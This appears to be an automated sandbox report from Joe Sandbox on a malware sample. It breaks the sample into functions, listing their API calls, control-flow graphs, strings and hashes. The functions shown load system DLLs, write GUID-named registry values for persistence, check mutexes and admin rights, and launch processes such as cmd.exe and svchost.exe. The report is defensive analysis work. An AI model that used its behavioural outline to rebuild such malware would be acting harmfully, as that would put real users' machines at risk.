                                                                                                            • Opcode Fuzzy Hash: 778d0c2f63ec5a978ad47edb1216f1f1c4a6eee0e51fcb9a5b04390283969c11
                                                                                                            • Instruction Fuzzy Hash: 20321AB5A40219AFEB25DB64DC8DF9AB778AB48700F1045D8F60DA7290DB74AEC0CF54
                                                                                                            Function 00318110 Relevance: 125.2, APIs: 51, Strings: 20, Instructions: 993libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 0031811E
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00318181
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                            • String ID: 5$ADVAPI32.DLL$CRYPT32.DLL$DBGHELP.DLL$GDI32.DLL$GDIPLUS.DLL$H$KERNEL32.DLL$MSI.DLL$NTDLL.DLL$OLE32.DLL$SECUR32.DLL$SHELL32.DLL$SHLWAPI.DLL$USER32.DLL$WINHTTP.DLL$WINMM.DLL$WS2_32.DLL$WTSAPI32.DLL$n
                                                                                                            • API String ID: 2574300362-974314553
                                                                                                            • Opcode ID: 2c35219de6259df2ac5fba70ea2357958de5f6d9b34d4e6df8344d2d473085c7
                                                                                                            • Instruction ID: 593c1078d9fed1b2d3bd944752f7a584f1287ff493915a854fdc0db2c72d2fbd
                                                                                                            • Opcode Fuzzy Hash: 2c35219de6259df2ac5fba70ea2357958de5f6d9b34d4e6df8344d2d473085c7
                                                                                                            • Instruction Fuzzy Hash: 51A22874905219DFCB6ACF64DC94BEAB7B9FB4C301F1484A9E50AA3240DB74AAC4CF54
                                                                                                            Function 003141E0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 61registrytimeCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 727 3141e0-31422e call 32359a RegCreateKeyExW 730 314230-314232 727->730 731 314234-31425c RegCloseKey call 323520 call 30b4a0 727->731 732 314295-314298 730->732 737 314290 731->737 738 31425e-314280 GetSystemTime SystemTimeToFileTime call 30b510 731->738 737->732 740 314285-31428a 738->740 740->737 741 31428c-31428e 740->741 741->732
                                                                                                            APIs
                                                                                                            • __snwprintf.LIBCMT ref: 003141FF
                                                                                                            • RegCreateKeyExW.KERNELBASE(80000001,?,00000000,00000000,00000000,000F013F,00000000,00301585,00000000), ref: 00314226
                                                                                                            • RegCloseKey.KERNELBASE(00301585), ref: 00314238
                                                                                                            • _memset.LIBCMT ref: 00314246
                                                                                                            • GetSystemTime.KERNEL32(?), ref: 00314265
                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00314276
                                                                                                            Strings
                                                                                                            • SOFTWARE\%s, xrefs: 003141EE
                                                                                                            • {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 003141E9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Time$System$CloseCreateFile__snwprintf_memset
                                                                                                            • String ID: SOFTWARE\%s${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}
                                                                                                            • API String ID: 3491885642-838102593
                                                                                                            • Opcode ID: b4f2d3664f7676c5777fa556a2fd6acddf63637af90fcf0178c1bb5b17e89023
                                                                                                            • Instruction ID: 88735ca44f1301f1c8e4c1e937c2d1023276968fec0a0581d4155d2375dc125e
                                                                                                            • Opcode Fuzzy Hash: b4f2d3664f7676c5777fa556a2fd6acddf63637af90fcf0178c1bb5b17e89023
                                                                                                            • Instruction Fuzzy Hash: DA118A72A50219B6EB25D7B0DC4AFFA733CAB18700F000D54B609DA0C1FAB5E6D4C7A1
                                                                                                            Function 003100A0 Relevance: 89.5, APIs: 42, Strings: 9, Instructions: 229stringCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 528 3100a0-3100d4 GetCommandLineW CommandLineToArgvW lstrcmpiW 529 3100e5-3100f9 lstrcmpiW 528->529 530 3100d6-3100e0 528->530 532 3101c6-3101da lstrcmpiW 529->532 533 3100ff-310112 IsUserAnAdmin 529->533 531 3103e9 530->531 534 3103ee-3103f1 531->534 535 3101e0-3101f9 OpenMutexW 532->535 536 3102a5-3102b9 lstrcmpiW 532->536 537 310114-310134 OpenEventW 533->537 538 31016c-31016e ExitProcess 533->538 541 310214-31022d OpenMutexW 535->541 542 3101fb-31020e WaitForSingleObject CloseHandle 535->542 539 3102bf-3102d8 OpenMutexW 536->539 540 31037e-310392 lstrcmpiW 536->540 543 310162-310164 ExitProcess 537->543 544 310136-310142 SetEvent 537->544 545 3102f3-31030c OpenMutexW 539->545 546 3102da-3102ed WaitForSingleObject CloseHandle 539->546 540->531 549 310394-31039b 540->549 547 310248-31024f 541->547 548 31022f-310242 WaitForSingleObject CloseHandle 541->548 542->541 550 310144-310150 CloseHandle ExitProcess 544->550 551 310156-31016a CloseHandle 544->551 552 310327-31032e 545->552 553 31030e-310321 WaitForSingleObject CloseHandle 545->553 546->545 554 310251-310271 OpenMutexW 547->554 555 31028b-31029b Sleep 547->555 548->547 556 3103d7-3103e7 Sleep 549->556 557 31039d-3103bd OpenMutexW 549->557 565 310174-31017b 551->565 559 310330-310350 OpenMutexW 552->559 560 31036a-31037a Sleep 552->560 553->552 561 310273-310285 CloseHandle Sleep 554->561 562 310287 554->562 555->534 556->534 563 3103d3 557->563 564 3103bf-3103d1 CloseHandle Sleep 557->564 568 310352-310364 CloseHandle Sleep 559->568 569 310366 559->569 560->534 561->547 562->555 563->556 564->549 566 3101b7-3101bc 565->566 567 31017d-31019d OpenMutexW 565->567 566->534 570 3101b3 567->570 571 31019f-3101b1 CloseHandle Sleep 567->571 568->552 569->560 570->566 571->565
                                                                                                            APIs
                                                                                                            • GetCommandLineW.KERNEL32 ref: 003100A6
                                                                                                            • CommandLineToArgvW.SHELL32(?,?), ref: 003100B7
                                                                                                            • lstrcmpiW.KERNELBASE(?,{34E50511-FBB8-42F8-98A2-2629192A03A0}), ref: 003100CC
                                                                                                            • lstrcmpiW.KERNEL32(?,{D77DC119-1B4A-41E3-A066-2927413CA76D}), ref: 003100F1
                                                                                                            • IsUserAnAdmin.SHELL32 ref: 00310109
                                                                                                            • OpenEventW.KERNEL32(00100002,00000000,{8399C93C-77D8-4A9E-96D7-0200E8B3EE42}), ref: 00310127
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 0031013A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00310148
                                                                                                            • ExitProcess.KERNEL32 ref: 00310150
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CommandEventLinelstrcmpi$AdminArgvCloseExitHandleOpenProcessUser
                                                                                                            • String ID: {0F01F64A-5A5B-4CC4-B069-D85368F634DD}${34E50511-FBB8-42F8-98A2-2629192A03A0}${6B55C48E-8FCD-482F-91CF-9C0B3FD8AC2B}${8399C93C-77D8-4A9E-96D7-0200E8B3EE42}${8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}${9D5F29AE-FCE3-40C6-8BE3-47B8C62D31E2}${A3956157-6EDC-4743-A7B9-FF7CDC2529A9}${D77DC119-1B4A-41E3-A066-2927413CA76D}${FF4E2D7F-189B-498D-BED3-F1AA783F6E3F}
                                                                                                            • API String ID: 786710000-2393832290
                                                                                                            • Opcode ID: 79d026693474232b16b0f33343bceec693f0f67590dcb0d47750eb582f972c19
                                                                                                            • Instruction ID: e37879f036d7fe55111e81e32b96f577fdf64acc0bec22aee32c469fa7472f9c
                                                                                                            • Opcode Fuzzy Hash: 79d026693474232b16b0f33343bceec693f0f67590dcb0d47750eb582f972c19
                                                                                                            • Instruction Fuzzy Hash: 93910974A40304EBD72E9BA4DD8DBEE7B79BB4C702F108529F516A62D0DBB894C0CB51
                                                                                                            Function 00316410 Relevance: 58.0, APIs: 27, Strings: 6, Instructions: 267memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 572 316410-31644c LocalAlloc 573 316452-316476 572->573 574 316865 572->574 577 31684a-31684e 573->577 578 31647c-316480 573->578 575 316867-31686a 574->575 579 316850-316856 577->579 580 316858-31685f LocalFree 577->580 578->577 581 316486-316494 578->581 579->575 580->574 582 316496-3164a7 call 325d7b 581->582 583 3164aa-3164bd 581->583 582->583 585 3164bf-316509 call 32359a call 325d7b 583->585 586 31650e-316521 583->586 600 316845 585->600 587 316527-316541 LocalAlloc 586->587 588 3165cc-3165df 586->588 591 3165c7 587->591 592 316547-31655b GetWindowsDirectoryW 587->592 593 3165e1-3165f9 SHGetKnownFolderPath 588->593 594 31665e-316671 588->594 591->600 596 3165ba-3165c1 LocalFree 592->596 597 31655d-3165b3 call 32359a call 325d7b 592->597 601 316659 593->601 602 3165fb-316652 call 32359a CoTaskMemFree call 325d7b 593->602 598 3166f0-316703 594->598 599 316673-31668b SHGetKnownFolderPath 594->599 596->591 597->596 608 316709-316723 LocalAlloc 598->608 609 3167b8-3167cb 598->609 606 3166eb 599->606 607 31668d-3166e4 call 32359a CoTaskMemFree call 325d7b 599->607 601->600 602->601 606->600 607->606 614 3167b3 608->614 615 316729-31673d GetTempPathW 608->615 609->600 613 3167cd-3167e5 SHGetKnownFolderPath 609->613 613->600 620 3167e7-31683e call 32359a CoTaskMemFree call 325d7b 613->620 614->600 621 3167a6-3167ad LocalFree 615->621 622 31673f-31679f call 301c60 call 32359a call 325d7b 615->622 620->600 621->614 622->621
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNELBASE(00000040,?), ref: 00316439
                                                                                                            • _wcscat.LIBCMT ref: 003164A2
                                                                                                            • __snwprintf.LIBCMT ref: 003164E4
                                                                                                            • _wcscat.LIBCMT ref: 003164FA
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0031652E
                                                                                                            • GetWindowsDirectoryW.KERNEL32(00000000,00000104), ref: 00316553
                                                                                                            • __snwprintf.LIBCMT ref: 00316595
                                                                                                            • _wcscat.LIBCMT ref: 003165AB
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003165C1
                                                                                                            • SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,?), ref: 003165F1
                                                                                                            • __snwprintf.LIBCMT ref: 00316627
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 00316636
                                                                                                            • _wcscat.LIBCMT ref: 0031664A
                                                                                                            • SHGetKnownFolderPath.SHELL32(00337C40,00000000,00000000,?), ref: 00316683
                                                                                                            • __snwprintf.LIBCMT ref: 003166B9
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 003166C8
                                                                                                            • _wcscat.LIBCMT ref: 003166DC
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00316710
                                                                                                            • GetTempPathW.KERNEL32(00000104,00000000), ref: 00316735
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003167AD
                                                                                                              • Part of subcall function 00301C60: _wcsrchr.LIBCMT ref: 00301C6C
                                                                                                            • __snwprintf.LIBCMT ref: 00316781
                                                                                                            • _wcscat.LIBCMT ref: 00316797
                                                                                                            • SHGetKnownFolderPath.SHELL32(00337C10,00000000,00000000,?), ref: 003167DD
                                                                                                            • __snwprintf.LIBCMT ref: 00316813
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 00316822
                                                                                                            • _wcscat.LIBCMT ref: 00316836
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031685F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _wcscat$FreeLocal__snwprintf$Path$AllocFolderKnownTask$DirectoryTempWindows_wcsrchr
                                                                                                            • String ID: '%s%s'$'%s%s'$'%s%s'$'%s%s'$'%s%s'$'%s'
                                                                                                            • API String ID: 3511546674-4258658051
                                                                                                            • Opcode ID: 98cfebd92ab05c3875e0237a53451740adbff69973350cff7bf216ca5b7d19ea
                                                                                                            • Instruction ID: 57de9cd5a01d794fd616c065124027c51d501cf85429f4b7a61b1c19ae09c942
                                                                                                            • Opcode Fuzzy Hash: 98cfebd92ab05c3875e0237a53451740adbff69973350cff7bf216ca5b7d19ea
                                                                                                            • Instruction Fuzzy Hash: 78B151B1A4011DEBDB29DB90DC8AFE9B779AB68300F1081A8E50DAB191D7749FC5CF50
                                                                                                            Function 0030B860 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 121COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _memset$__snwprintf$Directory$FileModuleNameSystemWindows
                                                                                                            • String ID: %s\cmd.exe$%s\explorer.exe$%s\svchost.exe
                                                                                                            • API String ID: 60459999-2596767422
                                                                                                            • Opcode ID: fd717997b1a53d42618b39f38ec5a29df894ca0b4bb3739ab5bd723b9dca22df
                                                                                                            • Instruction ID: 616acfafb75979e1614b3ccd3e3578af9fbd9d0f59a8f589d43f608a18b18a70
                                                                                                            • Opcode Fuzzy Hash: fd717997b1a53d42618b39f38ec5a29df894ca0b4bb3739ab5bd723b9dca22df
                                                                                                            • Instruction Fuzzy Hash: F441B775B103186AD761EB649C86FEA7378AF48700F008598B61DE60C1FBB48B94CB91
                                                                                                            Function 00316870 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 86memoryprocessCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 664 316870-31688d LocalAlloc 665 316991 664->665 666 316893-3168a4 GetSystemDirectoryW 664->666 667 316993-316996 665->667 668 316987-31698b LocalFree 666->668 669 3168aa-3168be LocalAlloc 666->669 668->665 669->668 670 3168c4-316960 call 3179f0 call 32359a call 323520 CreateProcessW 669->670 677 316962-31697b LocalFree * 2 670->677 678 31697d-316981 LocalFree 670->678 677->667 678->668
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNELBASE(00000040,0000FFFE), ref: 00316880
                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00007FFF), ref: 0031689C
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 003168B1
                                                                                                              • Part of subcall function 003179F0: lstrlenW.KERNEL32(?,?,?,?,?,?,?,003168E6,003347E8), ref: 00317A19
                                                                                                            • __snwprintf.LIBCMT ref: 003168FD
                                                                                                            • _memset.LIBCMT ref: 00316910
                                                                                                            • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00316957
                                                                                                            • LocalFree.KERNELBASE(00000000), ref: 00316966
                                                                                                            • LocalFree.KERNELBASE(00000000), ref: 00316970
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00316981
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031698B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Alloc$CreateDirectoryProcessSystem__snwprintf_memsetlstrlen
                                                                                                            • String ID: D$G3
                                                                                                            • API String ID: 2329958830-2481853025
                                                                                                            • Opcode ID: 8155eacb707956a3ab6822000f299226f7efd0e45024ec2e763573ff8cf6e21e
                                                                                                            • Instruction ID: f66260a6b91b31176bb43fe230bf26f338721d327f4c324174fe41e1ac008a13
                                                                                                            • Opcode Fuzzy Hash: 8155eacb707956a3ab6822000f299226f7efd0e45024ec2e763573ff8cf6e21e
                                                                                                            • Instruction Fuzzy Hash: F63182B5A10208BBDB25DBA4DC89FEDBB78AF48700F1045A8F609AA190DB755AC4CB50
                                                                                                            Function 003142A0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 76registryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 679 3142a0-3142f2 call 323520 GetModuleFileNameW 682 3143c6 679->682 683 3142f8-31431b call 31c570 679->683 685 3143c8-3143cb 682->685 683->682 687 314321-314361 call 32359a RegOpenKeyExW 683->687 690 314363-314389 RegSetValueExW 687->690 691 3143b9-3143c0 LocalFree 687->691 692 31438b-3143aa RegCloseKey LocalFree 690->692 693 3143ac-3143b3 RegCloseKey 690->693 691->682 692->685 693->691
                                                                                                            APIs
                                                                                                            • _memset.LIBCMT ref: 003142D4
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 003142EA
                                                                                                              • Part of subcall function 0031C570: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0031430B,?,00000000), ref: 0031C58C
                                                                                                              • Part of subcall function 0031C570: GetFileSize.KERNEL32(000000FF,00000000,?,0031430B,?), ref: 0031C5A1
                                                                                                              • Part of subcall function 0031C570: LocalAlloc.KERNELBASE(00000040,000000FF,?,0031430B), ref: 0031C5B6
                                                                                                              • Part of subcall function 0031C570: ReadFile.KERNELBASE(000000FF,00000000,000000FF,?,00000000), ref: 0031C5D7
                                                                                                              • Part of subcall function 0031C570: CloseHandle.KERNEL32(000000FF), ref: 0031C5ED
                                                                                                            • __snwprintf.LIBCMT ref: 00314337
                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,?,00000000,00000102,?), ref: 00314359
                                                                                                            • RegSetValueExW.KERNELBASE(?,{2DD5D29F-1CE3-49E7-8572-9D856412ED59},00000000,00000003,00000000,00000000), ref: 00314381
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00314392
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031439F
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 003143B3
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003143C0
                                                                                                            Strings
                                                                                                            • {2DD5D29F-1CE3-49E7-8572-9D856412ED59}, xrefs: 00314375
                                                                                                            • SOFTWARE\%s, xrefs: 00314326
                                                                                                            • {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 00314321
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseLocal$Free$AllocCreateHandleModuleNameOpenReadSizeValue__snwprintf_memset
                                                                                                            • String ID: SOFTWARE\%s${2DD5D29F-1CE3-49E7-8572-9D856412ED59}${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}
                                                                                                            • API String ID: 3609211549-3847718966
                                                                                                            • Opcode ID: ccb132e6ac97f16b66b2c2bf33d6ae00e4ecdad0652bab35d4541fb35c677a47
                                                                                                            • Instruction ID: afd083e09e24275ba54dc58c22bda5b13990ae0626e1d0a9b6ea9a5df576995e
                                                                                                            • Opcode Fuzzy Hash: ccb132e6ac97f16b66b2c2bf33d6ae00e4ecdad0652bab35d4541fb35c677a47
                                                                                                            • Instruction Fuzzy Hash: A82180B5A40318ABD735DB60DC4DFEA7778AF48700F108688B61CA6181E7B49AC4CFA1
                                                                                                            Function 0030FF10 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 74memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 694 30ff10-30ff2b SHGetKnownFolderPath 695 30ff31-30ff45 LocalAlloc 694->695 696 30ffff 694->696 698 30fff5-30fff9 CoTaskMemFree 695->698 699 30ff4b-30ff72 wnsprintfW 695->699 697 310001-310004 696->697 698->696 700 30ff74-30ff80 call 310400 699->700 701 30ffeb-30ffef LocalFree 699->701 700->701 704 30ff82-30ffa7 CreateDirectoryW 700->704 701->698 705 30ffb6-30ffd9 LocalFree * 2 CoTaskMemFree 704->705 706 30ffa9-30ffb4 GetLastError 704->706 705->697 706->705 707 30ffdb-30ffdf 706->707 707->701 708 30ffe1-30ffe5 LocalFree 707->708 708->701
                                                                                                            APIs
                                                                                                            • SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,00371178,?,?,?,?,003015DF,00371178), ref: 0030FF23
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,003015DF,00371178), ref: 0030FF38
                                                                                                            • wnsprintfW.SHLWAPI ref: 0030FF67
                                                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00371178), ref: 0030FFEF
                                                                                                              • Part of subcall function 00310400: AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0031044D
                                                                                                              • Part of subcall function 00310400: _memset.LIBCMT ref: 00310463
                                                                                                              • Part of subcall function 00310400: SetEntriesInAclW.ADVAPI32(00000001,FFFFFFFF,00000000,00000000), ref: 003104A0
                                                                                                              • Part of subcall function 00310400: LocalAlloc.KERNEL32(00000040,00000014), ref: 003104B3
                                                                                                              • Part of subcall function 00310400: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 003104C8
